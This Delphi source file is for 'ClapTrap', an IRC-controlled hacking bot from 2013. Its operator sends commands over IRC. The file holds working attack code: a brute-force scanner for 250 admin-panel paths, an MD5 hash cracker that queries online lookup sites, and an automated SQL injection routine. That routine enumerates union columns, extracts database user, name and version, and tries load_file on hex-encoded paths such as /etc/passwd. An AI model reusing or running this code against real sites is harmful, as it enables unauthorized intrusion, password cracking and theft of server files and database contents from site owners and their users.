// ClapTrap IRC Bot 0.5
// (C) Doddy Hackman 2013
unit menu;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, sSkinManager, StdCtrls, sButton, sEdit, sLabel, sGroupBox, ComCtrls,
sStatusBar, acPNG, ExtCtrls, GIFImg, sMemo, IdContext, IdBaseComponent,
IdComponent, IdTCPConnection, IdTCPClient, IdCmdTCPClient, IdIRC, PerlRegEx,
IdMultipartFormData, IdHTTP;
type
TForm2 = class(TForm)
sSkinManager1: TsSkinManager;
sGroupBox1: TsGroupBox;
sLabel1: TsLabel;
sLabel2: TsLabel;
sLabel3: TsLabel;
sLabel4: TsLabel;
sEdit1: TsEdit;
sEdit2: TsEdit;
sEdit3: TsEdit;
sEdit4: TsEdit;
sButton1: TsButton;
sButton2: TsButton;
sStatusBar1: TsStatusBar;
Image1: TImage;
sGroupBox2: TsGroupBox;
sMemo1: TsMemo;
Image2: TImage;
PerlRegEx1: TPerlRegEx;
IdIRC1: TIdIRC;
PerlRegEx2: TPerlRegEx;
IdHTTP1: TIdHTTP;
procedure sButton1Click(Sender: TObject);
procedure sButton2Click(Sender: TObject);
procedure IdIRC1PrivateMessage(ASender: TIdContext; const ANicknameFrom,
AHost, ANicknameTo, AMessage: string);
procedure FormCreate(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form2: TForm2;
implementation
{$R *.dfm}
procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
begin
Application.Terminate;
end;
procedure TForm2.FormCreate(Sender: TObject);
begin
sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
sSkinManager1.SkinName := 'cappuccino';
sSkinManager1.Active := True;
end;
procedure TForm2.IdIRC1PrivateMessage(ASender: TIdContext; const ANicknameFrom,
AHost, ANicknameTo, AMessage: string);
var
rta: string;
z: integer;
par: TIdMultiPartFormDataStream;
target: string;
var
IdHTTP: TIdHTTP;
i: integer;
var
url: string;
urldos: string;
code: string;
codedos: string;
pass1: string;
pass2: string;
urltest: string;
urlgen: string;
var
hextest: string;
web1: string;
web2: string;
web3: string;
full: string;
const
paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
'login/index.asp', 'login/index.aspx', 'login/login.asp',
'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
'administracion/index.asp', 'administracion/index.aspx',
'administracion/login.asp', 'administracion/login.aspx',
'administracion/webmaster.asp', 'administracion/webmaster.aspx',
'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
'admin/admin.php', 'admin/index.php', 'admin/login.php',
'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
'admin/default.php', 'administracion/', 'administracion/index.php',
'administracion/login.php', 'administracion/ingresar.php',
'administracion/admin.php', 'administration/', 'administration/index.php',
'administration/login.php', 'administrator/index.php',
'administrator/login.php', 'administrator/system.php', 'system/',
'system/login.php', 'admin.php', 'login.php', 'administrador.php',
'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
'admin/index.html', 'admin/login.html', 'admin/home.php',
'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
'administrator/index.html', 'administrator/login.html',
'administrator/account.html', 'administrator/account.php',
'administrator.html', 'login.html', 'modelsearch/login.php',
'moderator.php', 'moderator.html', 'moderator/login.php',
'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
'moderator/', 'account.php', 'account.html', 'controlpanel/',
'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
'administrator/index.asp', 'administrator/login.asp',
'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
'system_administration/', 'ss_vms_admin_sm/');
begin
if ANicknameFrom = sEdit4.Text then
begin
// Help
PerlRegEx1.Regex := '!help';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
IdIRC1.Say(ANicknameFrom, 'Hi , I am ClapTrap and my commands are :');
IdIRC1.Say(ANicknameFrom, '!locateip <target>');
IdIRC1.Say(ANicknameFrom, '!panel <target>');
IdIRC1.Say(ANicknameFrom, '!sqli <target>');
IdIRC1.Say(ANicknameFrom, '!crackmd5 <md5>');
IdIRC1.Say(ANicknameFrom, '!help <?>');
IdIRC1.Say(ANicknameFrom, 'Good Bye');
end;
//
// LocateIP
PerlRegEx1.Regex := '!locateip (.*)';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
sStatusBar1.Panels[0].Text := '[+] LocateIP : Working';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] LocateIP : Working');
IdIRC1.Say(ANicknameFrom, '[+] LocateIP : Working');
par := TIdMultiPartFormDataStream.Create;
par.AddFormField('DOMAINNAME', PerlRegEx1.SubExpressions[1]);
rta := IdHTTP1.Post('http://whatismyipaddress.com/hostname-ip', par);
PerlRegEx2.Regex := 'Lookup IP Address: <a href=(.*)>(.*)<\/a>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
target := PerlRegEx2.SubExpressions[2];
rta := IdHTTP1.Get(
'http://www.melissadata.com/lookups/iplocation.asp?ipaddress=' +
target);
PerlRegEx2.Regex := 'City<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] City : ' + PerlRegEx2.SubExpressions[2]
);
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] City : Not Found');
end;
PerlRegEx2.Regex := 'Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] Country : ' + PerlRegEx2.SubExpressions
[2]);
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] Country : Not Found');
end;
PerlRegEx2.Regex :=
'State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] State : ' + PerlRegEx2.SubExpressions
[2]);
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] State : Not Found');
end;
//
// Get DNS
rta := IdHTTP1.Get('http://www.ip-adress.com/reverse_ip/' + target);
PerlRegEx2.Regex := 'whois\/(.*?)\">Whois';
PerlRegEx2.Subject := rta;
while PerlRegEx2.MatchAgain do
begin
for z := 1 to PerlRegEx2.SubExpressionCount do
IdIRC1.Say(ANicknameFrom,
'[+] DNS Found : ' + PerlRegEx2.SubExpressions[z]);
end;
end;
sStatusBar1.Panels[0].Text := '[+] LocateIP : Finished';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] LocateIP : Finished');
IdIRC1.Say(ANicknameFrom, '[+] LocateIP : Finished');
//
end;
//
// PanelFinder
PerlRegEx1.Regex := '!panel (.*)';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
//
sStatusBar1.Panels[0].Text := '[+] PanelFinder : Working';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] PanelFinder : Working');
sMemo1.Lines.Add('[+] PanelFinder : Working');
try
IdHTTP := TIdHTTP.Create(nil);
for i := Low(paginas) to High(paginas) do
try
sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
Form2.sStatusBar1.Update;
IdHTTP.Get(PerlRegEx1.SubExpressions[1] + '/' + paginas[i]);
if IdHTTP.ResponseCode = 200 then
IdIRC1.Say(ANicknameFrom,
'[+] Link Found : ' + PerlRegEx1.SubExpressions[1]
+ '/' + paginas[i]);
except
on E: EIdHttpProtocolException do
;
on E: Exception do
;
end;
finally
IdHTTP.Free;
end;
sStatusBar1.Panels[0].Text := '[+] PanelFinder : Finished';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] PanelFinder : Finished');
sMemo1.Lines.Add('[+] PanelFinder : Finished');
//
end;
//
// Crack MD5
PerlRegEx1.Regex := '!crackmd5 (.*)';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
sStatusBar1.Panels[0].Text := '[+] CrackMD5 : Working';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] CrackMD5 : Working');
IdIRC1.Say(ANicknameFrom, '[+] CrackMD5 : Working');
sStatusBar1.Panels[0].Text := '[+] Searching in md5.hashcracking.com ...';
Form2.sStatusBar1.Update;
rta := IdHTTP1.Get('http://md5.hashcracking.com/search.php?md5=' +
PerlRegEx1.SubExpressions[1]);
PerlRegEx2.Regex := 'Cleartext of (.*) is (.*)';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, PerlRegEx1.SubExpressions[1]
+ ':' + PerlRegEx2.SubExpressions[2]);
end
else
begin
rta := IdHTTP1.Get('http://md5.rednoize.com/?q=' +
PerlRegEx1.SubExpressions[1]);
PerlRegEx2.Regex := '<div id=\"result\" >(.*)<\/div>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
if not(Length(PerlRegEx2.SubExpressions[1]) = 32) then
begin
IdIRC1.Say(ANicknameFrom, PerlRegEx1.SubExpressions[1]
+ ':' + PerlRegEx2.SubExpressions[1]);
end
else
begin
sStatusBar1.Panels[0].Text :=
'[+] Searching in md52.altervista.org ...';
Form2.sStatusBar1.Update;
rta := IdHTTP1.Get
('http://md52.altervista.org/index.php?md5=' +
PerlRegEx1.SubExpressions[1]);
PerlRegEx2.Regex :=
'<br>Password: <font color=\"Red\">(.*)<\/font><\/b>';
PerlRegEx2.Subject := rta;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, PerlRegEx1.SubExpressions[1]
+ ':' + PerlRegEx2.SubExpressions[1]);
end
else
begin
IdIRC1.Say(ANicknameFrom, '[-] Hash not cracked');
end;
end;
end;
end;
sStatusBar1.Panels[0].Text := '[+] CrackMD5 : Finished';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] CrackMD5 : Finished');
IdIRC1.Say(ANicknameFrom, '[+] CrackMD5 : Finished');
end;
//
// SQLI Scanner
PerlRegEx1.Regex := '!sqli (.*)';
PerlRegEx1.Subject := AMessage;
if PerlRegEx1.Match then
begin
sStatusBar1.Panels[0].Text := '[+] SQLI Scanner : Working';
Form2.sStatusBar1.Update;
sMemo1.Lines.Add('[+] SQLI Scanner : Working');
IdIRC1.Say(ANicknameFrom, '[+] SQLI Scanner : Working');
pass1 := '+';
pass2 := '--';
urltest := 'concat(0x4b30425241,1,0x4b30425241)';
sStatusBar1.Panels[0].Text := '[+] Checking ...';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] Checking ...');
code := IdHTTP1.Get
(PerlRegEx1.SubExpressions[1] + '1' + pass1 + 'and' + pass1 + '1=1' +
pass2);
codedos := IdHTTP1.Get
(PerlRegEx1.SubExpressions[1] + '1' + pass1 + 'and' + pass1 + '1=0' +
pass2);
if not(code = codedos) then
begin
IdIRC1.Say(ANicknameFrom, '[+] Vulnerable !');
sStatusBar1.Panels[0].Text := '[+] Finding columns number';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] Finding columns number');
urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' +
pass1 + 'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
urlgen := '1';
for i := 2 to 36 do
begin
sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
Form2.sStatusBar1.Update;
urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
+ ',0x4b30425241)';
urlgen := urlgen + ',' + IntToStr(i);
code := IdHTTP1.Get(PerlRegEx1.SubExpressions[1] + urltest + pass2);
PerlRegEx2.Regex := 'K0BRA(.*?)K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] Columns Length : ' + IntToStr(i));
IdIRC1.Say(ANicknameFrom,
'[+] The number ' + PerlRegEx2.SubExpressions[1] + ' show data');
urlgen := StringReplace(urlgen, PerlRegEx2.SubExpressions[1],
'hackman', []);
full := PerlRegEx1.SubExpressions[1] + '1' + pass1 + 'and' +
pass1 + '1=0' + pass1 + 'union' + pass1 + 'select' + pass1 +
urlgen;
IdIRC1.Say(ANicknameFrom, '[+] Link : ' + full);
//
pass1 := '+';
pass2 := '--';
hextest := '0x2f6574632f706173737764'; // /etc/passwd
hextest := '0x633A2F78616D70702F726561642E747874';
// #c:/xampp/read.txt
web1 := StringReplace(full, 'hackman', '0x4b30425241', []);
web2 := StringReplace(full, 'hackman',
'concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)', []);
web3 := StringReplace(full, 'hackman',
'unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(' +
hextest + '))))', []);
sStatusBar1.Panels[0].Text := '[+] Getting more data ...';
Form2.sStatusBar1.Update;
code := IdHTTP1.Get
(web1 + pass1 + 'from' + pass1 + 'mysql.user' + pass2);
PerlRegEx2.Regex := 'K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] mysqluser : ON');
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] mysqluser : OFF');
end;
code := IdHTTP1.Get(web1 + pass1 + 'from' + pass1 +
'information_schema.tables' + pass2);
PerlRegEx2.Regex := 'K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] information_schema.tables : ON');
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] information_schema.tables : OFF');
end;
code := IdHTTP1.Get(web3);
PerlRegEx2.Regex := 'K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom, '[+] load_file : ON');
end
else
begin
IdIRC1.Say(ANicknameFrom, '[+] load_file : OFF');
end;
sStatusBar1.Panels[0].Text := '[+] Getting DB details ...';
Form2.sStatusBar1.Update;
code := IdHTTP1.Get(web2);
PerlRegEx2.Regex := 'K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA';
PerlRegEx2.Subject := code;
if PerlRegEx2.Match then
begin
IdIRC1.Say(ANicknameFrom,
'[+] User : ' + PerlRegEx2.SubExpressions[1]);
IdIRC1.Say(ANicknameFrom,
'[+] Database : ' + PerlRegEx2.SubExpressions[2]);
IdIRC1.Say(ANicknameFrom,
'[+] Version : ' + PerlRegEx2.SubExpressions[3]);
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
end
else
begin
IdIRC1.Say(ANicknameFrom, '[-] DB details not found');
sStatusBar1.Panels[0].Text := '[-] DB details not found';
Form2.sStatusBar1.Update;
end;
//
sStatusBar1.Panels[0].Text := '[+] Done';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] Done');
sMemo1.Lines.Add('[+] SQLI Scanner : Finished');
sStatusBar1.Panels[0].Text := '[+] SQLI Scanner : Finished';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] SQLI Scanner : Finished');
abort;
end
end;
sStatusBar1.Panels[0].Text := '[-] Columns Length not found';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[-] Columns Length not found');
end
else
begin
sStatusBar1.Panels[0].Text := '[-] Not vulnerable';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[-] Not vulnerable');
end;
sStatusBar1.Panels[0].Text := '[+] SQLI Scanner : Finished';
Form2.sStatusBar1.Update;
IdIRC1.Say(ANicknameFrom, '[+] SQLI Scanner : Finished');
sMemo1.Lines.Add('[+] SQLI Scanner : Finished');
end;
end;
end;
procedure TForm2.sButton1Click(Sender: TObject);
var
nick: string;
begin
nick := 'ClapTrap';
IdIRC1.Host := sEdit1.Text;
IdIRC1.Port := StrToInt(sEdit2.Text);
IdIRC1.Nickname := nick;
IdIRC1.Username := nick + ' 1 1 1 1';
IdIRC1.AltNickname := nick + '-l33t';
try
IdIRC1.Connect;
IdIRC1.Join(sEdit3.Text);
sStatusBar1.Panels[0].Text := '[+] Connected';
Form2.sStatusBar1.Update;
except
sStatusBar1.Panels[0].Text := '[-] Error';
Form2.sStatusBar1.Update;
end;
end;
procedure TForm2.sButton2Click(Sender: TObject);
begin
IdIRC1.Part(sEdit3.Text);
IdIRC1.Disconnect();
sStatusBar1.Panels[0].Text := '[+] OffLine';
Form2.sStatusBar1.Update;
end;
end.
// The End ?